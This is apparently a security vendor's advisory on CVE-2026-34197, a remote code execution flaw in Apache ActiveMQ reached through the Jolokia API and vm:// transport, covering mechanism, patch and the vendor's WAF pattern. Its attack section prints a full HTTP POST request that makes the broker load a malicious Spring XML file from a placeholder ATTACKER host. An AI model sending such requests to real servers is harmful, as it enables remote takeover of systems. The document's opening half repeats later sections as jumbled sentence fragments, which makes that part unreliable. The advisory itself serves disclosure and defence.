This vulnerability is a 'Remote Code Execution' vulnerability discovered in Apache ActiveMQ, where an attacker constructs
an attacker server address that returns malicious XML code using the VM transport method and sends it to the Apache ActiveMQ /api/jolokia
endpoint for execution. A security patch for this vulnerability was released on March 30, 2026, and AIWAF products are scheduled to
address this vulnerability through the "2328 / Apache ActiveMQ Remote Code Execution" pattern, which will be added
in the pattern update for May 2026.
handle asynchronous message transmission between applications and data integration between systems. This report provides
a detailed analysis of the CVE-2026-34197 vulnerability identified within the service.
Source: https://www.helpnetsecurity.com/2026/04/09/apache‑activemq‑rce‑vulnerability‑cve‑2026‑34197‑claude/
that attackers can exploit this vulnerability by transmitting a server address that returns a malicious Spring XML response,
thereby tricking the system into executing malicious files.
ActiveMQ supports the VM transport method (utilized via the vm:// format), which is a transport mechanism designed to embed
a broker directly inside an application. When a vm:// URL references a non-existent broker, ActiveMQ by default creates a new broker
instance immediately. During this process, ActiveMQ accepts a brokerConfig parameter that can include a remote URL controlled by an attacker.
Consequently, the newly initialized broker executes the malicious Spring XML configuration file hosted at the attacker's server URL,
leading to arbitrary remote command execution.
followed by an official security advisory and vulnerability disclosure on April 6. Therefore, organizations utilizing
the affected service can effectively mitigate this vulnerability by applying the relevant security patch.
Our AIWAF products are scheduled to address and defend against this vulnerability through the pattern
"2328 / Apache ActiveMQ Remote Code Execution," which will be deployed in the upcoming May 2026 pattern update.
Source: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt
which significantly amplifies the impact of the CVE-2026-34197 vulnerability. Furthermore, since this vulnerability had remained latent
within the system for approximately 13 years, there is a high probability that it could be immediately exploited for attacks.
Therefore, organizations utilizing this service must promptly apply the relevant security patches.
Our Threat Analysis (TA) team is continuously monitoring vulnerabilities emerging from Apache ActiveMQ and remains committed to
responding swiftly to any related security flaws discovered in the future.
an attacker server address that returns malicious XML code using the VM transport method and sends it to the Apache ActiveMQ /api/jolokia
endpoint for execution. A security patch for this vulnerability was released on March 30, 2026, and AIWAF products are scheduled to
address this vulnerability through the "2328 / Apache ActiveMQ Remote Code Execution" pattern, which will be added
in the pattern update for May 2026.
1. Overview
Apache ActiveMQ is an open-source-based message broker that supports JMS (Java Message Service) and is primarily used tohandle asynchronous message transmission between applications and data integration between systems. This report provides
a detailed analysis of the CVE-2026-34197 vulnerability identified within the service.
Source: https://www.helpnetsecurity.com/2026/04/09/apache‑activemq‑rce‑vulnerability‑cve‑2026‑34197‑claude/
2. Attack Type
The CVE-2026-34197 vulnerability is a Remote Code Execution (RCE) flaw discovered in Apache ActiveMQ. It has been identifiedthat attackers can exploit this vulnerability by transmitting a server address that returns a malicious Spring XML response,
thereby tricking the system into executing malicious files.
ActiveMQ supports the VM transport method (utilized via the vm:// format), which is a transport mechanism designed to embed
a broker directly inside an application. When a vm:// URL references a non-existent broker, ActiveMQ by default creates a new broker
instance immediately. During this process, ActiveMQ accepts a brokerConfig parameter that can include a remote URL controlled by an attacker.
Consequently, the newly initialized broker executes the malicious Spring XML configuration file hosted at the attacker's server URL,
leading to arbitrary remote command execution.
POST /api/jolokia/ HTTP/1.1
Content‑Length: 225
Content‑Type: application/json
Host: www.test.com
User‑Agent: HTTPie
{
"type": "exec",
"mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
"operation": "addNetworkConnector",
"arguments": ["static:(vm://rce?brokerConfig=xbean:http://ATTACKER:8888/payload.xml)"]
}
3. Mitigation and Countermeasures
Apache ActiveMQ became aware of the vulnerability in March 2026 and released a security patch (version 6.2.3) on March 30,followed by an official security advisory and vulnerability disclosure on April 6. Therefore, organizations utilizing
the affected service can effectively mitigate this vulnerability by applying the relevant security patch.
Our AIWAF products are scheduled to address and defend against this vulnerability through the pattern
"2328 / Apache ActiveMQ Remote Code Execution," which will be deployed in the upcoming May 2026 pattern update.
Source: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt
4. Conclusion
Apache ActiveMQ is an open-source-based message broker. Given its open-source nature, it is widely adopted across various environments,which significantly amplifies the impact of the CVE-2026-34197 vulnerability. Furthermore, since this vulnerability had remained latent
within the system for approximately 13 years, there is a high probability that it could be immediately exploited for attacks.
Therefore, organizations utilizing this service must promptly apply the relevant security patches.
Our Threat Analysis (TA) team is continuously monitoring vulnerabilities emerging from Apache ActiveMQ and remains committed to
responding swiftly to any related security flaws discovered in the future.
5. References
- https://nvd.nist.gov/vuln/detail/CVE-2026-34197
- https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
